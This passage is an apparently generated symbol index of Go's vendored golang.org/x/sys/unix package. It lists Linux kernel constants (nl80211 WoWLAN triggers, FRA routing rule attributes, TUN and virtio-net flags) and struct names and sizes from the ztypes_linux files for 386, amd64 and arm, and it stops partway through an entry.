NL80211_WOWLAN_TRIG_MAGIC_PKT (line 5883) | NL80211_WOWLAN_TRIG_MAGIC_PKT = 0x3 constant NL80211_WOWLAN_TRIG_NET_DETECT (line 5884) | NL80211_WOWLAN_TRIG_NET_DETECT = 0x12 constant NL80211_WOWLAN_TRIG_NET_DETECT_RESULTS (line 5885) | NL80211_WOWLAN_TRIG_NET_DETECT_RESULTS = 0x13 constant NL80211_WOWLAN_TRIG_PKT_PATTERN (line 5886) | NL80211_WOWLAN_TRIG_PKT_PATTERN = 0x4 constant NL80211_WOWLAN_TRIG_RFKILL_RELEASE (line 5887) | NL80211_WOWLAN_TRIG_RFKILL_RELEASE = 0x9 constant NL80211_WOWLAN_TRIG_TCP_CONNECTION (line 5888) | NL80211_WOWLAN_TRIG_TCP_CONNECTION = 0xe constant NL80211_WOWLAN_TRIG_WAKEUP_PKT_80211 (line 5889) | NL80211_WOWLAN_TRIG_WAKEUP_PKT_80211 = 0xa constant NL80211_WOWLAN_TRIG_WAKEUP_PKT_80211_LEN (line 5890) | NL80211_WOWLAN_TRIG_WAKEUP_PKT_80211_LEN = 0xb constant NL80211_WOWLAN_TRIG_WAKEUP_PKT_8023 (line 5891) | NL80211_WOWLAN_TRIG_WAKEUP_PKT_8023 = 0xc constant NL80211_WOWLAN_TRIG_WAKEUP_PKT_8023_LEN (line 5892) | NL80211_WOWLAN_TRIG_WAKEUP_PKT_8023_LEN = 0xd constant NL80211_WOWLAN_TRIG_WAKEUP_TCP_CONNLOST (line 5893) | NL80211_WOWLAN_TRIG_WAKEUP_TCP_CONNLOST = 0x10 constant NL80211_WOWLAN_TRIG_WAKEUP_TCP_MATCH (line 5894) | NL80211_WOWLAN_TRIG_WAKEUP_TCP_MATCH = 0xf constant NL80211_WOWLAN_TRIG_WAKEUP_TCP_NOMORETOKENS (line 5895) | NL80211_WOWLAN_TRIG_WAKEUP_TCP_NOMORETOKENS = 0x11 constant NL80211_WPA_VERSION_1 (line 5896) | NL80211_WPA_VERSION_1 = 0x1 constant NL80211_WPA_VERSION_2 (line 5897) | NL80211_WPA_VERSION_2 = 0x2 constant NL80211_WPA_VERSION_3 (line 5898) | NL80211_WPA_VERSION_3 = 0x4 constant FRA_UNSPEC (line 5902) | FRA_UNSPEC = 0x0 constant FRA_DST (line 5903) | FRA_DST = 0x1 constant FRA_SRC (line 5904) | FRA_SRC = 0x2 constant FRA_IIFNAME (line 5905) | FRA_IIFNAME = 0x3 constant FRA_GOTO (line 5906) | FRA_GOTO = 0x4 constant FRA_UNUSED2 (line 5907) | FRA_UNUSED2 = 0x5 constant FRA_PRIORITY (line 5908) | FRA_PRIORITY = 0x6 constant FRA_UNUSED3 (line 5909) | FRA_UNUSED3 = 0x7 constant FRA_UNUSED4 (line 5910) | FRA_UNUSED4 = 0x8 constant FRA_UNUSED5 (line 5911) | FRA_UNUSED5 = 0x9 constant FRA_FWMARK (line 5912) | FRA_FWMARK = 0xa constant FRA_FLOW (line 5913) | FRA_FLOW = 0xb constant FRA_TUN_ID (line 5914) | FRA_TUN_ID = 0xc constant FRA_SUPPRESS_IFGROUP (line 5915) | FRA_SUPPRESS_IFGROUP = 0xd constant FRA_SUPPRESS_PREFIXLEN (line 5916) | FRA_SUPPRESS_PREFIXLEN = 0xe constant FRA_TABLE (line 5917) | FRA_TABLE = 0xf constant FRA_FWMASK (line 5918) | FRA_FWMASK = 0x10 constant FRA_OIFNAME (line 5919) | FRA_OIFNAME = 0x11 constant FRA_PAD (line 5920) | FRA_PAD = 0x12 constant FRA_L3MDEV (line 5921) | FRA_L3MDEV = 0x13 constant FRA_UID_RANGE (line 5922) | FRA_UID_RANGE = 0x14 constant FRA_PROTOCOL (line 5923) | FRA_PROTOCOL = 0x15 constant FRA_IP_PROTO (line 5924) | FRA_IP_PROTO = 0x16 constant FRA_SPORT_RANGE (line 5925) | FRA_SPORT_RANGE = 0x17 constant FRA_DPORT_RANGE (line 5926) | FRA_DPORT_RANGE = 0x18 constant FR_ACT_UNSPEC (line 5927) | FR_ACT_UNSPEC = 0x0 constant FR_ACT_TO_TBL (line 5928) | FR_ACT_TO_TBL = 0x1 constant FR_ACT_GOTO (line 5929) | FR_ACT_GOTO = 0x2 constant FR_ACT_NOP (line 5930) | FR_ACT_NOP = 0x3 constant FR_ACT_RES3 (line 5931) | FR_ACT_RES3 = 0x4 constant FR_ACT_RES4 (line 5932) | FR_ACT_RES4 = 0x5 constant FR_ACT_BLACKHOLE (line 5933) | FR_ACT_BLACKHOLE = 0x6 constant FR_ACT_UNREACHABLE (line 5934) | FR_ACT_UNREACHABLE = 0x7 constant FR_ACT_PROHIBIT (line 5935) | FR_ACT_PROHIBIT = 0x8 constant AUDIT_NLGRP_NONE (line 5939) | AUDIT_NLGRP_NONE = 0x0 constant AUDIT_NLGRP_READLOG (line 5940) | AUDIT_NLGRP_READLOG = 0x1 constant TUN_F_CSUM (line 5944) | TUN_F_CSUM = 0x1 constant TUN_F_TSO4 (line 5945) | TUN_F_TSO4 = 0x2 constant TUN_F_TSO6 (line 5946) | TUN_F_TSO6 = 0x4 constant TUN_F_TSO_ECN (line 5947) | TUN_F_TSO_ECN = 0x8 constant TUN_F_UFO (line 5948) | TUN_F_UFO = 0x10 constant TUN_F_USO4 (line 5949) | TUN_F_USO4 = 0x20 constant TUN_F_USO6 (line 5950) | TUN_F_USO6 = 0x40 constant VIRTIO_NET_HDR_F_NEEDS_CSUM (line 5954) | VIRTIO_NET_HDR_F_NEEDS_CSUM = 0x1 constant VIRTIO_NET_HDR_F_DATA_VALID (line 5955) | VIRTIO_NET_HDR_F_DATA_VALID = 0x2 constant VIRTIO_NET_HDR_F_RSC_INFO (line 5956) | VIRTIO_NET_HDR_F_RSC_INFO = 0x4 constant VIRTIO_NET_HDR_GSO_NONE (line 5960) | VIRTIO_NET_HDR_GSO_NONE = 0x0 constant VIRTIO_NET_HDR_GSO_TCPV4 (line 5961) | VIRTIO_NET_HDR_GSO_TCPV4 = 0x1 constant VIRTIO_NET_HDR_GSO_UDP (line 5962) | VIRTIO_NET_HDR_GSO_UDP = 0x3 constant VIRTIO_NET_HDR_GSO_TCPV6 (line 5963) | VIRTIO_NET_HDR_GSO_TCPV6 = 0x4 constant VIRTIO_NET_HDR_GSO_UDP_L4 (line 5964) | VIRTIO_NET_HDR_GSO_UDP_L4 = 0x5 constant VIRTIO_NET_HDR_GSO_ECN (line 5965) | VIRTIO_NET_HDR_GSO_ECN = 0x80 type SchedAttr (line 5968) | type SchedAttr struct constant SizeofSchedAttr (line 5981) | SizeofSchedAttr = 0x38 type Cachestat_t (line 5983) | type Cachestat_t struct type CachestatRange (line 5990) | type CachestatRange struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_386.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofLong (line 10) | SizeofLong = 0x4 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 103) | type Dirent struct type Flock_t (line 112) | type Flock_t struct type DmNameList (line 120) | type DmNameList struct constant FADV_DONTNEED (line 126) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 127) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 130) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 141) | type RawSockaddr struct type RawSockaddrAny (line 146) | type RawSockaddrAny struct type Iovec (line 151) | type Iovec struct type Msghdr (line 156) | type Msghdr struct type Cmsghdr (line 166) | type Cmsghdr struct type ifreq (line 172) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 178) | SizeofSockaddrNFCLLCP = 0x58 constant SizeofIovec (line 179) | SizeofIovec = 0x8 constant SizeofMsghdr (line 180) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 181) | SizeofCmsghdr = 0xc constant SizeofSockFprog (line 185) | SizeofSockFprog = 0x8 type PtraceRegs (line 188) | type PtraceRegs struct type FdSet (line 208) | type FdSet struct type Sysinfo_t (line 212) | type Sysinfo_t struct type Ustat_t (line 229) | type Ustat_t struct type EpollEvent (line 236) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 243) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 247) | POLLRDHUP = 0x2000 type Sigset_t (line 250) | type Sigset_t struct constant _C__NSIG (line 254) | _C__NSIG = 0x41 constant SIG_BLOCK (line 257) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 258) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 259) | SIG_SETMASK = 0x2 type Siginfo (line 262) | type Siginfo struct type Termios (line 269) | type Termios struct type Taskstats (line 280) | type Taskstats struct type cpuMask (line 343) | type cpuMask constant _NCPUBITS (line 346) | _NCPUBITS = 0x20 constant CBitFieldMaskBit0 (line 350) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 351) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 352) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 353) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 354) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 355) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 356) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 357) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 358) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 359) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 360) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 361) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 362) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 363) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 364) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 365) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 366) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 367) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 368) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 369) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 370) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 371) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 372) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 373) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 374) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 375) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 376) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 377) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 378) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 379) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 380) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 381) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 382) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 383) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 384) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 385) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 386) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 387) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 388) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 389) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 390) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 391) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 392) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 393) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 394) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 395) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 396) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 397) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 398) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 399) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 400) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 401) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 402) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 403) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 404) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 405) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 406) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 407) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 408) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 409) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 410) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 411) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 412) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 413) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 416) | type SockaddrStorage struct type HDGeometry (line 422) | type HDGeometry struct type Statfs_t (line 429) | type Statfs_t struct type TpacketHdr (line 444) | type TpacketHdr struct constant SizeofTpacketHdr (line 455) | SizeofTpacketHdr = 0x18 type RTCPLLInfo (line 458) | type RTCPLLInfo struct type BlkpgPartition (line 468) | type BlkpgPartition struct constant BLKPG (line 477) | BLKPG = 0x1269 type XDPUmemReg (line 480) | type XDPUmemReg struct type CryptoUserAlg (line 488) | type CryptoUserAlg struct type CryptoStatAEAD (line 498) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 507) | type CryptoStatAKCipher struct type CryptoStatCipher (line 518) | type CryptoStatCipher struct type CryptoStatCompress (line 527) | type CryptoStatCompress struct type CryptoStatHash (line 536) | type CryptoStatHash struct type CryptoStatKPP (line 543) | type CryptoStatKPP struct type CryptoStatRNG (line 551) | type CryptoStatRNG struct type CryptoStatLarval (line 559) | type CryptoStatLarval struct type CryptoReportLarval (line 563) | type CryptoReportLarval struct type CryptoReportHash (line 567) | type CryptoReportHash struct type CryptoReportCipher (line 573) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 580) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 589) | type CryptoReportAEAD struct type CryptoReportComp (line 597) | type CryptoReportComp struct type CryptoReportRNG (line 601) | type CryptoReportRNG struct type CryptoReportAKCipher (line 606) | type CryptoReportAKCipher struct type CryptoReportKPP (line 610) | type CryptoReportKPP struct type CryptoReportAcomp (line 614) | type CryptoReportAcomp struct type LoopInfo (line 618) | type LoopInfo struct type TIPCSubscr (line 633) | type TIPCSubscr struct type TIPCSIOCLNReq (line 640) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 646) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 651) | type PPSKInfo struct constant PPS_GETPARAMS (line 660) | PPS_GETPARAMS = 0x800470a1 constant PPS_SETPARAMS (line 661) | PPS_SETPARAMS = 0x400470a2 constant PPS_GETCAP (line 662) | PPS_GETCAP = 0x800470a3 constant PPS_FETCH (line 663) | PPS_FETCH = 0xc00470a4 constant PIDFD_NONBLOCK (line 667) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 670) | type SysvIpcPerm struct type SysvShmDesc (line 683) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 102) | type Dirent struct type Flock_t (line 111) | type Flock_t struct type DmNameList (line 120) | type DmNameList struct constant FADV_DONTNEED (line 128) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 129) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 132) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 143) | type RawSockaddr struct type RawSockaddrAny (line 148) | type RawSockaddrAny struct type Iovec (line 153) | type Iovec struct type Msghdr (line 158) | type Msghdr struct type Cmsghdr (line 169) | type Cmsghdr struct type ifreq (line 175) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 181) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 182) | SizeofIovec = 0x10 constant SizeofMsghdr (line 183) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 184) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 188) | SizeofSockFprog = 0x10 type PtraceRegs (line 191) | type PtraceRegs struct type FdSet (line 221) | type FdSet struct type Sysinfo_t (line 225) | type Sysinfo_t struct type Ustat_t (line 243) | type Ustat_t struct type EpollEvent (line 251) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 258) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 262) | POLLRDHUP = 0x2000 type Sigset_t (line 265) | type Sigset_t struct constant _C__NSIG (line 269) | _C__NSIG = 0x41 constant SIG_BLOCK (line 272) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 273) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 274) | SIG_SETMASK = 0x2 type Siginfo (line 277) | type Siginfo struct type Termios (line 285) | type Termios struct type Taskstats (line 296) | type Taskstats struct type cpuMask (line 356) | type cpuMask constant _NCPUBITS (line 359) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 363) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 364) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 365) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 366) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 367) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 368) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 369) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 370) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 371) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 372) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 373) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 374) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 375) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 376) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 377) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 378) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 379) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 380) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 381) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 382) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 383) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 384) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 385) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 386) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 387) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 388) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 389) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 390) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 391) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 392) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 393) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 394) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 395) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 396) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 397) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 398) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 399) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 400) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 401) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 402) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 403) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 404) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 405) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 406) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 407) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 408) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 409) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 410) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 411) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 412) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 413) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 414) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 415) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 416) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 417) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 418) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 419) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 420) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 421) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 422) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 423) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 424) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 425) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 426) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 429) | type SockaddrStorage struct type HDGeometry (line 435) | type HDGeometry struct type Statfs_t (line 442) | type Statfs_t struct type TpacketHdr (line 457) | type TpacketHdr struct constant SizeofTpacketHdr (line 469) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 472) | type RTCPLLInfo struct type BlkpgPartition (line 482) | type BlkpgPartition struct constant BLKPG (line 492) | BLKPG = 0x1269 type XDPUmemReg (line 495) | type XDPUmemReg struct type CryptoUserAlg (line 504) | type CryptoUserAlg struct type CryptoStatAEAD (line 514) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 523) | type CryptoStatAKCipher struct type CryptoStatCipher (line 534) | type CryptoStatCipher struct type CryptoStatCompress (line 543) | type CryptoStatCompress struct type CryptoStatHash (line 552) | type CryptoStatHash struct type CryptoStatKPP (line 559) | type CryptoStatKPP struct type CryptoStatRNG (line 567) | type CryptoStatRNG struct type CryptoStatLarval (line 575) | type CryptoStatLarval struct type CryptoReportLarval (line 579) | type CryptoReportLarval struct type CryptoReportHash (line 583) | type CryptoReportHash struct type CryptoReportCipher (line 589) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 596) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 605) | type CryptoReportAEAD struct type CryptoReportComp (line 613) | type CryptoReportComp struct type CryptoReportRNG (line 617) | type CryptoReportRNG struct type CryptoReportAKCipher (line 622) | type CryptoReportAKCipher struct type CryptoReportKPP (line 626) | type CryptoReportKPP struct type CryptoReportAcomp (line 630) | type CryptoReportAcomp struct type LoopInfo (line 634) | type LoopInfo struct type TIPCSubscr (line 650) | type TIPCSubscr struct type TIPCSIOCLNReq (line 657) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 663) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 668) | type PPSKInfo struct constant PPS_GETPARAMS (line 678) | PPS_GETPARAMS = 0x800870a1 constant PPS_SETPARAMS (line 679) | PPS_SETPARAMS = 0x400870a2 constant PPS_GETCAP (line 680) | PPS_GETCAP = 0x800870a3 constant PPS_FETCH (line 681) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 685) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 688) | type SysvIpcPerm struct type SysvShmDesc (line 701) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_arm.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofLong (line 10) | SizeofLong = 0x4 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 105) | type Dirent struct type Flock_t (line 114) | type Flock_t struct type DmNameList (line 124) | type DmNameList struct constant FADV_DONTNEED (line 132) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 133) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 136) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 147) | type RawSockaddr struct type RawSockaddrAny (line 152) | type RawSockaddrAny struct type Iovec (line 157) | type Iovec struct type Msghdr (line 162) | type Msghdr struct type Cmsghdr (line 172) | type Cmsghdr struct type ifreq (line 178) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 184) | SizeofSockaddrNFCLLCP = 0x58 constant SizeofIovec (line 185) | SizeofIovec = 0x8 constant SizeofMsghdr (line 186) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 187) | SizeofCmsghdr = 0xc constant SizeofSockFprog (line 191) | SizeofSockFprog = 0x8 type PtraceRegs (line 194) | type PtraceRegs struct type FdSet (line 198) | type FdSet struct type Sysinfo_t (line 202) | type Sysinfo_t struct type Ustat_t (line 219) | type Ustat_t struct type EpollEvent (line 226) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 234) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 238) | POLLRDHUP = 0x2000 type Sigset_t (line 241) | type Sigset_t struct constant _C__NSIG (line 245) | _C__NSIG = 0x41 constant SIG_BLOCK (line 248) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 249) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 250) | SIG_SETMASK = 0x2 type Siginfo (line 253) | type Siginfo struct type Termios (line 260) | type Termios struct type Taskstats (line 271) | type Taskstats struct type cpuMask (line 334) | type cpuMask constant _NCPUBITS (line 337) | _NCPUBITS = 0x20 constant CBitFieldMaskBit0 (line 341) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 342) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 343) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 344) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 345) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 346) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 347) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 348) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 349) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 350) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 